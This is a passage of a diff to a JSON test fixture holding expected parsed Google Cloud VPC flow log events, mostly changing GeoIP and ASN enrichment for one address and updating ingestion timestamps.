 "iana_number": "6",
 "packets": 600,
 "direction": "outbound"
- },
- "@timestamp": "2019-06-14T03:50:11.981Z",
- "ecs": {
- "version": "1.12.0"
- },
- "related": {
- "ip": [
- "10.139.99.242",
- "67.43.156.13"
- ]
- },
- "gcp": {
- "vpcflow": {
- "reporter": "SRC",
- "rtt": {
- "ms": 86
- }
- },
- "source": {
- "vpc": {
- "project_id": "my-sample-project",
- "subnetwork_name": "default",
- "vpc_name": "default"
- },
- "instance": {
- "region": "us-east1",
- "project_id": "my-sample-project",
- "zone": "us-east1-b"
- }
- }
- },
- "event": {
- "ingested": "2021-12-09T13:37:46.391385Z",
- "original": "{\"insertId\":\"1ulp77rfdvho5c\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65316,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"600\",\"reporter\":\"SRC\",\"rtt_msec\":\"86\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
- "kind": "event",
- "start": "2019-06-14T03:40:00.565831992Z",
- "end": "2019-06-14T03:49:56.220838853Z",
- "id": "1ulp77rfdvho5c",
- "category": "network",
- "type": "connection"
 }
 },
 {
@@ -4352,11 +4557,16 @@
 },
 "source": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 49680,
@@ -4428,7 +4638,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.391390400Z",
+ "ingested": "2021-12-14T14:43:27.415194887Z",
 "original": "{\"insertId\":\"1ulp77rfdvho5p\",\"jsonPayload\":{\"bytes_sent\":\"1541638\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49680},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"949\",\"reporter\":\"DEST\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:39:59.711043814Z",
@@ -4526,7 +4736,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.391396100Z",
+ "ingested": "2021-12-14T14:43:27.415195396Z",
 "original": "{\"insertId\":\"1ulp77rfdvho4y\",\"jsonPayload\":{\"bytes_sent\":\"755901\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60112},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"227\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:14.031541248Z",
@@ -4542,11 +4752,16 @@
 },
 "destination": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 33558,
@@ -4624,7 +4839,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.391401600Z",
+ "ingested": "2021-12-14T14:43:27.415195783Z",
 "original": "{\"insertId\":\"1ulp77rfdvho4o\",\"jsonPayload\":{\"bytes_sent\":\"248715\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.394676451Z\",\"packets_sent\":\"270\",\"reporter\":\"SRC\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:39:58.492572765Z",
@@ -4635,9 +4850,39 @@
 }
 },
 {
+ "@timestamp": "2019-06-14T03:50:11.981Z",
+ "ecs": {
+ "version": "1.12.0"
+ },
+ "related": {
+ "ip": [
+ "67.43.156.13",
+ "10.139.99.242"
+ ]
+ },
 "log": {
 "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
 },
+ "gcp": {
+ "destination": {
+ "vpc": {
+ "project_id": "my-sample-project",
+ "subnetwork_name": "default",
+ "vpc_name": "default"
+ },
+ "instance": {
+ "region": "us-east1",
+ "project_id": "my-sample-project",
+ "zone": "us-east1-b"
+ }
+ },
+ "vpcflow": {
+ "reporter": "DEST",
+ "rtt": {
+ "ms": 86
+ }
+ }
+ },
 "destination": {
 "address": "10.139.99.242",
 "port": 9200,
@@ -4646,13 +4891,16 @@
 },
 "source": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa",
- "city_name": "Broomfield",
- "region_name": "Colorado"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 33652
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 65316,
@@ -4660,6 +4908,16 @@
 "ip": "67.43.156.13",
 "packets": 709
 },
+ "event": {
+ "ingested": "2021-12-14T14:43:27.415196173Z",
+ "original": "{\"insertId\":\"1ulp77rfdvho5g\",\"jsonPayload\":{\"bytes_sent\":\"69757\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65316},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"709\",\"reporter\":\"DEST\",\"rtt_msec\":\"86\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
+ "kind": "event",
+ "start": "2019-06-14T03:40:00.565831992Z",
+ "end": "2019-06-14T03:49:56.220838853Z",
+ "id": "1ulp77rfdvho5g",
+ "category": "network",
+ "type": "connection"
+ },
 "tags": [
 "preserve_original_event"
 ],
@@ -4671,7 +4929,9 @@
 "iana_number": "6",
 "packets": 709,
 "direction": "inbound"
- },
+ }
+ },
+ {
 "@timestamp": "2019-06-14T03:50:11.981Z",
 "ecs": {
 "version": "1.12.0"
@@ -4682,6 +4942,9 @@
 "10.139.99.242"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
 "destination": {
 "vpc": {
@@ -4698,25 +4961,10 @@
 "vpcflow": {
 "reporter": "DEST",
 "rtt": {
- "ms": 86
+ "ms": 87
 }
 }
 },
- "event": {
- "ingested": "2021-12-09T13:37:46.391407100Z",
- "original": "{\"insertId\":\"1ulp77rfdvho5g\",\"jsonPayload\":{\"bytes_sent\":\"69757\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65316},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"709\",\"reporter\":\"DEST\",\"rtt_msec\":\"86\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
- "kind": "event",
- "start": "2019-06-14T03:40:00.565831992Z",
- "end": "2019-06-14T03:49:56.220838853Z",
- "id": "1ulp77rfdvho5g",
- "category": "network",
- "type": "connection"
- }
- },
- {
- "log": {
- "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
- },
 "destination": {
 "address": "10.139.99.242",
 "port": 9200,
@@ -4725,13 +4973,16 @@
 },
 "source": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa",
- "city_name": "Broomfield",
- "region_name": "Colorado"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 33652
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 65263,
@@ -4739,6 +4990,16 @@
 "ip": "67.43.156.13",
 "packets": 728
 },
+ "event": {
+ "ingested": "2021-12-14T14:43:27.415196573Z",
+ "original": "{\"insertId\":\"1ulp77rfdvho59\",\"jsonPayload\":{\"bytes_sent\":\"69440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65263},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"87\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
+ "kind": "event",
+ "start": "2019-06-14T03:40:01.270990648Z",
+ "end": "2019-06-14T03:49:56.220748025Z",
+ "id": "1ulp77rfdvho59",
+ "category": "network",
+ "type": "connection"
+ },
 "tags": [
 "preserve_original_event"
 ],
@@ -4750,17 +5011,22 @@
 "iana_number": "6",
 "packets": 728,
 "direction": "inbound"
- },
+ }
+ },
+ {
 "@timestamp": "2019-06-14T03:50:11.981Z",
 "ecs": {
 "version": "1.12.0"
 },
 "related": {
 "ip": [
- "67.43.156.13",
- "10.139.99.242"
+ "192.168.2.117",
+ "10.87.40.76"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
 "destination": {
 "vpc": {
@@ -4777,25 +5043,10 @@
 "vpcflow": {
 "reporter": "DEST",
 "rtt": {
- "ms": 87
+ "ms": 36
 }
 }
 },
- "event": {
- "ingested": "2021-12-09T13:37:46.391412500Z",
- "original": "{\"insertId\":\"1ulp77rfdvho59\",\"jsonPayload\":{\"bytes_sent\":\"69440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65263},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"87\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
- "kind": "event",
- "start": "2019-06-14T03:40:01.270990648Z",
- "end": "2019-06-14T03:49:56.220748025Z",
- "id": "1ulp77rfdvho59",
- "category": "network",
- "type": "connection"
- }
- },
- {
- "log": {
- "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
- },
 "destination": {
 "address": "10.87.40.76",
 "port": 5601,
@@ -4816,6 +5067,16 @@
 "ip": "192.168.2.117",
 "packets": 7
 },
+ "event": {
+ "ingested": "2021-12-14T14:43:27.415196963Z",
+ "original": "{\"insertId\":\"1ulp77rfdvho57\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
+ "kind": "event",
+ "start": "2019-06-14T03:40:20.454046087Z",
+ "end": "2019-06-14T03:40:20.569744903Z",
+ "id": "1ulp77rfdvho57",
+ "category": "network",
+ "type": "connection"
+ },
 "tags": [
 "preserve_original_event"
 ],
@@ -4827,19 +5088,30 @@
 "iana_number": "6",
 "packets": 7,
 "direction": "inbound"
- },
+ }
+ },
+ {
 "@timestamp": "2019-06-14T03:50:11.981Z",
 "ecs": {
 "version": "1.12.0"
 },
 "related": {
 "ip": [
- "192.168.2.117",
- "10.87.40.76"
+ "10.87.40.76",
+ "192.168.2.117"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
- "destination": {
+ "vpcflow": {
+ "reporter": "SRC",
+ "rtt": {
+ "ms": 36
+ }
+ },
+ "source": {
 "vpc": {
 "project_id": "my-sample-project",
 "subnetwork_name": "default",
@@ -4850,29 +5122,8 @@
 "project_id": "my-sample-project",
 "zone": "us-east1-b"
 }
- },
- "vpcflow": {
- "reporter": "DEST",
- "rtt": {
- "ms": 36
- }
 }
 },
- "event": {
- "ingested": "2021-12-09T13:37:46.391417900Z",
- "original": "{\"insertId\":\"1ulp77rfdvho57\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
- "kind": "event",
- "start": "2019-06-14T03:40:20.454046087Z",
- "end": "2019-06-14T03:40:20.569744903Z",
- "id": "1ulp77rfdvho57",
- "category": "network",
- "type": "connection"
- }
- },
- {
- "log": {
- "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
- },
 "destination": {
 "geo": {
 "continent_name": "America",
@@ -4893,6 +5144,16 @@
 "domain": "kibana",
 "ip": "10.87.40.76"
 },
+ "event": {
+ "ingested": "2021-12-14T14:43:27.415197356Z",
+ "original": "{\"insertId\":\"1ulp77rfdvho5e\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50438,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
+ "kind": "event",
+ "start": "2019-06-14T03:40:20.454046087Z",
+ "end": "2019-06-14T03:40:20.569744903Z",
+ "id": "1ulp77rfdvho5e",
+ "category": "network",
+ "type": "connection"
+ },
 "tags": [
 "preserve_original_event"
 ],
@@ -4904,22 +5165,27 @@
 "iana_number": "6",
 "packets": 7,
 "direction": "outbound"
- },
+ }
+ },
+ {
 "@timestamp": "2019-06-14T03:50:11.981Z",
 "ecs": {
 "version": "1.12.0"
 },
 "related": {
 "ip": [
- "10.87.40.76",
- "192.168.2.117"
+ "10.139.99.242",
+ "192.168.2.165"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
 "vpcflow": {
 "reporter": "SRC",
 "rtt": {
- "ms": 36
+ "ms": 233
 }
 },
 "source": {
@@ -4935,21 +5201,6 @@
 }
 }
 },
- "event": {
- "ingested": "2021-12-09T13:37:46.391423500Z",
- "original": "{\"insertId\":\"1ulp77rfdvho5e\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50438,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
- "kind": "event",
- "start": "2019-06-14T03:40:20.454046087Z",
- "end": "2019-06-14T03:40:20.569744903Z",
- "id": "1ulp77rfdvho5e",
- "category": "network",
- "type": "connection"
- }
- },
- {
- "log": {
- "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
- },
 "destination": {
 "geo": {
 "continent_name": "Asia",
@@ -4972,6 +5223,16 @@
 "domain": "elasticsearch",
 "ip": "10.139.99.242"
 },
+ "event": {
+ "ingested": "2021-12-14T14:43:27.415197755Z",
+ "original": "{\"insertId\":\"1ulp77rfdvho4d\",\"jsonPayload\":{\"bytes_sent\":\"2395\",\"connection\":{\"dest_ip\":\"192.168.2.165\",\"dest_port\":59623,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"11\",\"reporter\":\"SRC\",\"rtt_msec\":\"233\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
+ "kind": "event",
+ "start": "2019-06-14T03:40:46.541094678Z",
+ "end": "2019-06-14T03:40:52.361155668Z",
+ "id": "1ulp77rfdvho4d",
+ "category": "network",
+ "type": "connection"
+ },
 "tags": [
 "preserve_original_event"
 ],
@@ -4983,46 +5244,6 @@
 "iana_number": "6",
 "packets": 11,
 "direction": "outbound"
- },
- "@timestamp": "2019-06-14T03:50:11.981Z",
- "ecs": {
- "version": "1.12.0"
- },
- "related": {
- "ip": [
- "10.139.99.242",
- "192.168.2.165"
- ]
- },
- "gcp": {
- "vpcflow": {
- "reporter": "SRC",
- "rtt": {
- "ms": 233
- }
- },
- "source": {
- "vpc": {
- "project_id": "my-sample-project",
- "subnetwork_name": "default",
- "vpc_name": "default"
- },
- "instance": {
- "region": "us-east1",
- "project_id": "my-sample-project",
- "zone": "us-east1-b"
- }
- }
- },
- "event": {
- "ingested": "2021-12-09T13:37:46.391427700Z",
- "original": "{\"insertId\":\"1ulp77rfdvho4d\",\"jsonPayload\":{\"bytes_sent\":\"2395\",\"connection\":{\"dest_ip\":\"192.168.2.165\",\"dest_port\":59623,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"11\",\"reporter\":\"SRC\",\"rtt_msec\":\"233\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
- "kind": "event",
- "start": "2019-06-14T03:40:46.541094678Z",
- "end": "2019-06-14T03:40:52.361155668Z",
- "id": "1ulp77rfdvho4d",
- "category": "network",
- "type": "connection"
 }
 },
 {
@@ -5037,11 +5258,16 @@
 },
